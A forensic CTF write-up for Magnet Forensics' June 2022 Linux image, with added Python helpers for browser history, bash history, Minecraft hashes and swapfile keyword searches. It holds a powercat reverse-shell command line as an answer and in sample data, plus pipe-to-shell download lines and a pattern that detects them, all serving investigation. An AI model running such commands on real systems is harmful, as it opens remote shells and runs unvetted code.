Magnet Forensics June 2022 CTF - Linux
This CTF was hosted by Magnet Forensics and was held on June 15, 2022, from 3 PM - 6 PM EST. Two datasets were provided - a Linux box and an iOS 15 FFS extract.
This question took much longer than I'd like to admit. I have no experience with Log4j, so I didn't know what it was exactly. Apache Log4j is a Java-based logging library (the one affected by CVE-2021-44228, which the user was researching). The answer was found in AXIOM > Web Related > Firefox Web History.
Or: by using Autopsy to traverse the filesystem to home/rafael/snap/firefox/common/.mozilla/firefox/mcrcm1xn.default/places.sqlite and reading the moz_places table. Note the snap path: a snap-packaged Firefox keeps its profile under ~/snap/firefox/common/.mozilla rather than the usual ~/.mozilla.
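If you would rather query places.sqlite directly than rely on AXIOM or Autopsy, the following added example (my own code, not part of the original write-up or of any tool mentioned in it) builds a small in-memory stand-in for the two Firefox history tables, joins visits to places, and converts Firefox's PRTime timestamps (microseconds since the Unix epoch, UTC) into readable dates. The URLs, titles and timestamps in it are constructed for the example; `open_history` shows how to open a real evidence copy read-only.

```python
import sqlite3
from datetime import datetime, timezone

# Constructed sample rows standing in for places.sqlite content; the URLs,
# titles and timestamps are made up for this example, not taken from the CTF image.
# visit_date is PRTime: microseconds since 1970-01-01 UTC.
SAMPLE_ROWS = [
    ("https://logging.apache.org/log4j/", "Apache Log4j", 1639180800000000),  # 2021-12-11
    ("https://mcuuid.net/", "Minecraft UUID lookup", 1644400000000000),      # 2022-02-09
]


def build_sample_db():
    """Create an in-memory database with the two Firefox history tables used here.
    Column sets are trimmed to the ones the query needs."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE moz_places (
            id INTEGER PRIMARY KEY, url TEXT, title TEXT,
            visit_count INTEGER, last_visit_date INTEGER);
        CREATE TABLE moz_historyvisits (
            id INTEGER PRIMARY KEY, place_id INTEGER,
            visit_date INTEGER, visit_type INTEGER);
    """)
    for place_id, (url, title, ts) in enumerate(SAMPLE_ROWS, start=1):
        db.execute("INSERT INTO moz_places VALUES (?,?,?,?,?)",
                   (place_id, url, title, 1, ts))
        db.execute("INSERT INTO moz_historyvisits VALUES (?,?,?,?)",
                   (place_id, place_id, ts, 1))
    return db


def open_history(path):
    """Open a real places.sqlite without touching it: read-only and immutable,
    so SQLite never tries to create a journal or WAL file next to the evidence."""
    return sqlite3.connect(f"file:{path}?mode=ro&immutable=1", uri=True)


def prtime_to_utc(prtime):
    """Firefox stores PRTime as microseconds; datetime wants seconds."""
    return datetime.fromtimestamp(prtime / 1_000_000, tz=timezone.utc)


def history(db):
    """Return (url, title, ISO-8601 UTC visit time) for every recorded visit,
    oldest first. Joining moz_historyvisits gives one row per visit, whereas
    moz_places.last_visit_date alone only keeps the most recent one."""
    rows = db.execute("""
        SELECT p.url, p.title, v.visit_date
        FROM moz_historyvisits AS v
        JOIN moz_places AS p ON p.id = v.place_id
        ORDER BY v.visit_date
    """).fetchall()
    return [(url, title, prtime_to_utc(ts).isoformat()) for url, title, ts in rows]


if __name__ == "__main__":
    for url, title, when in history(build_sample_db()):
        print(when, url, title)
```

Run it against an exported copy of places.sqlite with `history(open_history("places.sqlite"))`; work on a copy, because a live profile may hold the database in WAL mode with recent visits still in places.sqlite-wal.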
The operating system version can be found in AXIOM > OPERATING SYSTEM > Operating System Information – Linux
Or: by using Autopsy to traverse the filesystem to etc/lsb-release
Users with sudo privileges can change the hostname by invoking the hostnamectl command (or by editing /etc/hostname directly). Hostnames make it easier to locate and distinguish devices on a network. You can find the hostname in AXIOM by going to:
AXIOM > OPERATING SYSTEM > Operating System Information - Linux
Or: by using Autopsy to traverse the filesystem to etc/hostname
Attack on Titan
I figured the little blue birdie was referring to Mozilla Thunderbird, a free and open-source cross-platform email client. However, I had no idea what I was looking for, as I am unfamiliar with anime. So I started browsing e-mails in Autopsy under Data artifacts > E-mail Messages > Default. There was an e-mail that contained Twitter highlights. I googled one of the highlights, “Attack on Titan,” and it appeared to be an anime, so I figured that was the answer.
Attack on Titan is a Japanese manga series written and illustrated by Hajime Isayama.
This one I went straight to google for after finding the account name. Gamers seem to keep track of all sorts of stats. I was unsure if the UUID is useful in Minecraft, but apparently, some websites will provide you with the UUID if you have the account name. I also later found this hint in the web history: "get Minecraft UUID of user." So if we head to https://mcuuid.net and input the username n30forever, we get the UUID.
There is also a screenshot located in the user folder for Rafael named RAOxspYx.jpeg. This has the UUID listed in the screenshot of the CMD. However, this is quite blurry; I found it easier to get it through the website I used above.
A third option is home/rafael/marshalsec/poc/GhTvNIel.jpeg – a bit clearer than the screenshot above.
There were e-mails in the other Magnet CTF that showed information about the Guest Wi-Fi Connection, so I decided to head over to the e-mails to check there first. Using Autopsy, I headed to Data Artifacts > E-mail Messages > Default and sorted by name. I found four e-mails from email@example.com welcoming Rafael to the Wi-Fi network, Champlain Guest. I clicked on the oldest one to find the first password provided.
Installing software on Linux is usually done from the terminal, so I figured I would find this answer in the bash history file. Using Autopsy, head to Data Sources/LenovoFinal.E01/vol5/home/rafael/.bash_history. Here we can see that the user installed ZeroTier directly from the ZeroTier website by piping a curl download into a shell. Curl, short for Client URL, is a command-line tool that transfers data to or from a server. The -s option turns on silent mode, which suppresses the progress meter and error messages.
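Pipe-to-shell installs like this one are worth flagging in any history review: the script runs with whatever privileges the shell has (often sudo), and nothing of it is left on disk afterwards. The following added example, which is mine and not code from the write-up or from ZeroTier, scans a constructed .bash_history for `curl`/`wget` output piped into a shell and reports the URL and whether the shell ran under sudo. The history lines are made up for the example; only the ZeroTier install URL is the one the write-up refers to.

```python
import re

# Constructed .bash_history content for this example; it is not the contents
# of the CTF image's history file. Plain downloads (last line) must not be flagged.
SAMPLE_HISTORY = """\
sudo apt update
curl -s https://install.zerotier.com | sudo bash
wget -qO- https://example.invalid/setup.sh | sh
git clone https://github.com/mbechler/marshalsec
curl -o tool.tar.gz https://example.invalid/tool.tar.gz
"""

# A downloader, anything up to the first pipe, then a shell (optionally via sudo).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh)\b")
URL = re.compile(r"https?://[^\s'\"|]+")


def find_remote_installs(history_text):
    """Return (line_no, command, url, ran_as_root) for each command that pipes
    a remote download straight into a shell. Note that .bash_history has no
    timestamps unless HISTTIMEFORMAT was set, so line order is the only
    ordering available."""
    hits = []
    for n, line in enumerate(history_text.splitlines(), start=1):
        m = PIPE_TO_SHELL.search(line)
        if not m:
            continue
        url = URL.search(line)
        hits.append((n, line, url.group(0) if url else None, m.group(2) is not None))
    return hits


if __name__ == "__main__":
    for n, cmd, url, as_root in find_remote_installs(SAMPLE_HISTORY):
        print(f"line {n}: {url} {'(as root)' if as_root else ''}\n    {cmd}")
```

To reproduce what such an install did, fetch the script separately with `curl -o script.sh <url>` and read it; because -s hides errors, a pipe-to-bash install also gives no visible sign when the download was truncated or served by a different host.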
At first, I thought there might be a site that keeps track of view history. However, I remember seeing screenshots, and the “picture is worth a thousand words” led me to believe there might be something on one of those screenshots. There are five screenshots in Rafael’s Pictures folder, home/rafael/Pictures. In three screenshots, you can see Firefox open on a YouTube page. The YouTube video is titled “CVE-2021-44228 – Log4j – MINECRAFT VULNERABLE!” released on December 11, 2021, by John Hammond. The February 9 date can be found in the timestamps and at the top of the desktop taskbar.
I stumbled across this answer while browsing through the photos for another question. This photo can be located at: home/rafael/marshalsec/poc/aaGkBJdu.jpeg
If we google "Binging with Babish," we find the YouTube channel on page 1 of the results. Click on the YouTube link, and it will take you to "Babish Culinary Universe," whose description reads:
"Follow along with my torso every week as I recreate the iconic and obscure foods from your favorite movies and TV shows, all in dazzling 4K. We'll make some delicious dishes, have a little fun, and if you're not careful, you might just learn a thing or two."
The song Never Gonna Give you Up by Rick Astley was found in Rafael’s Downloads folder. So we can go to the web history to see what YouTube Channel he went to in order to find the second upload. Rafael was on Rick Astley’s official YouTube channel. If you click on Videos and scroll to the bottom, you will find the second uploaded video, “Whenever You Need Somebody.”
I was overthinking this one at first because of the question title "Buzzy Bees." Looking up the Buzzy Bees Minecraft update, it appears that the versions included in this update are 1.14 and 1.15. The question asks for the latest release of Minecraft, so I just focused on the most recent release that was on the machine. Using Autopsy, we can head to home/rafael/.minecraft/versions/1.18.1. This version is the latest release according to the system, and the hash can be found in the 1.18.1.json file. That file carries several SHA-1 values (the client jar, the server jar, the asset index and every library), so I had to try a few before getting the correct one.
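Rather than trying hashes one at a time, it helps to list every SHA-1 in the version JSON together with the JSON path it sits at, so you can see which one belongs to the client jar. The following added example (my own, not code from the write-up or from Mojang) does that over a constructed stand-in for a `.minecraft/versions/<ver>/<ver>.json`; the structure (`downloads.client`, `downloads.server`, `assetIndex`, `libraries[].downloads.artifact`) follows the real launcher format, but the hash strings are placeholders, not the real 1.18.1 values.

```python
import json

# Constructed stand-in for .minecraft/versions/1.18.1/1.18.1.json. The layout
# matches the launcher's version manifest; the sha1 strings are placeholders.
SAMPLE_VERSION_JSON = json.dumps({
    "id": "1.18.1",
    "type": "release",
    "downloads": {
        "client": {"sha1": "a" * 40, "size": 1, "url": "https://example.invalid/client.jar"},
        "server": {"sha1": "b" * 40, "size": 1, "url": "https://example.invalid/server.jar"},
    },
    "assetIndex": {"id": "1.18", "sha1": "c" * 40, "url": "https://example.invalid/1.18.json"},
    "libraries": [
        {"name": "com.mojang:brigadier:1.0.18",
         "downloads": {"artifact": {
             "sha1": "d" * 40,
             "path": "com/mojang/brigadier/1.0.18/brigadier-1.0.18.jar"}}},
    ],
})


def _walk_sha1(node, path="$"):
    """Recursively yield (json_path, value) for every 'sha1' key in the tree."""
    if isinstance(node, dict):
        for key, val in node.items():
            if key == "sha1" and isinstance(val, str):
                yield path + ".sha1", val
            else:
                yield from _walk_sha1(val, f"{path}.{key}")
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from _walk_sha1(val, f"{path}[{i}]")


def all_sha1(version_json_text):
    """Map every JSON path that holds a sha1 to its value, so a candidate hash
    can be identified by what it actually covers."""
    return dict(_walk_sha1(json.loads(version_json_text)))


def client_jar_sha1(version_json_text):
    """Return (version id, type, sha1 of the client jar) from a version JSON."""
    doc = json.loads(version_json_text)
    return doc["id"], doc.get("type"), doc["downloads"]["client"]["sha1"]


if __name__ == "__main__":
    for path, digest in all_sha1(SAMPLE_VERSION_JSON).items():
        print(f"{digest}  {path}")
    print("client jar:", client_jar_sha1(SAMPLE_VERSION_JSON))
```

With a real file, `sha1sum 1.18.1.jar` from the same directory should match `downloads.client.sha1`; a mismatch means the jar on disk is not the one the launcher fetched, which is exactly the kind of thing a Log4j-themed challenge might be hinting at.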
Located in the pictures directory is a screenshot of a windows machine. The weather, date and time can be found on the taskbar. This screenshot was located in the same folder as the cookbook challenge question. home/rafael/marshalsec/poc/aaGkBJdu.jpeg
powercat -c -p -e
Powercat is a PowerShell implementation of netcat used to send and serve shells: -c connects out to a host, -p sets the port, and -e executes a program once the connection is up, so the answer is a reverse-shell command line. To get the answer to this question, I searched for "powercat" in Autopsy. The answer can be found in the swapfile.
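A keyword search of swap or memory has one catch that a plain `grep -a` misses: PowerShell strings often sit in memory as UTF-16LE, with a zero byte between every character, so an ASCII search for "powercat" finds nothing. The following added example (my own, not code from the write-up, Autopsy or powercat) searches a constructed blob for the keyword in both encodings and extracts the surrounding printable run so the full command line comes back with each hit. The blob contents are made up for the example.

```python
import string

# Constructed blob standing in for a slice of a swapfile or memory image:
# padding, an ASCII command line, junk, then a UTF-16LE command line.
SAMPLE_BLOB = (
    b"\x00" * 16
    + b"powercat -c 10.0.0.5 -p 443 -e cmd\x00"
    + b"\xff" * 8
    + "powercat -l -p 8080 -e powershell".encode("utf-16-le")
    + b"\x00" * 16
)

# Printable ASCII minus the control whitespace characters.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def _printable_run(blob, pos, width):
    """Expand outwards from pos in units of `width` bytes while each unit is a
    printable character: 1 byte for ASCII, or a printable low byte followed by
    a zero high byte for UTF-16LE. Returns the [lo, hi) byte range."""
    def ok(i):
        if i < 0 or i + width > len(blob):
            return False
        unit = blob[i:i + width]
        return unit[0] in PRINTABLE and all(b == 0 for b in unit[1:])

    lo = pos
    while ok(lo - width):
        lo -= width
    hi = pos
    while ok(hi):
        hi += width
    return lo, hi


def find_keyword(blob, keyword):
    """Return (offset, encoding, surrounding text) for every ASCII or UTF-16LE
    occurrence of keyword, sorted by offset. Searching byte-wise means a
    UTF-16 string at an odd offset is still found."""
    hits = []
    for enc, width in (("ascii", 1), ("utf-16-le", 2)):
        needle = keyword.encode(enc)
        start = 0
        while (pos := blob.find(needle, start)) != -1:
            lo, hi = _printable_run(blob, pos, width)
            hits.append((pos, enc, blob[lo:hi].decode(enc)))
            start = pos + 1
    return sorted(hits)


if __name__ == "__main__":
    for offset, enc, text in find_keyword(SAMPLE_BLOB, "powercat"):
        print(f"0x{offset:08x} {enc:9} {text}")
```

On a real image, read the swapfile in chunks and overlap them by a few hundred bytes so a command line straddling a chunk boundary is not lost; the command-line equivalents are `strings -a` for ASCII and `strings -a -e l` for 16-bit little-endian text, piped through `grep -i powercat`.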
💥🔎If this has inspired you to practice your forensic skills, Magnet Forensics and many other authors have uploaded datasets on the Computer Forensic Reference DataSet Portal (CFReDS).